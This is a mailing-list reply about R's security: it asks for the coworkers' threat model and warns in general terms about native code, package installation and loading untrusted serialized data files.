On Tue, 5 Oct 2021 22:20:33 +0000
Thomas Subia <thomas.subia at fmindustries.com> wrote:
> Some co-workers are wondering about how secure R software is.
I'm afraid that this question is too hard to answer without their
threat model. Secure against what, specifically?
> Is there any documentation on this which I can forward to them?
Well, R is a programming language. It's Turing-complete (see halting
problem), will happily run machine code from shared objects (see
dyn.load, .C, .Call), and install.packages() is there to download
third-party code from the Internet. But that's the case with all
programming languages I know that are used for statistics, which aren't
supposed to run untrusted code.
Maybe you're concerned about data input/output instead. Functions are
first-class objects, so it's possible to save and load them from data
files. Not sure if there's a way to run code on data load, but you can
do it on print() (e.g. print.nls(x) calling x$m$getAllPars()), so don't
load()/readRDS() untrusted data files. There are known bugs in the
deserialiser, too: https://bugs.r-project.org/show_bug.cgi?id=16034
Don't know if it's documented anywhere, though. What are your
co-workers concerned about?
--
Best regards,
Ivan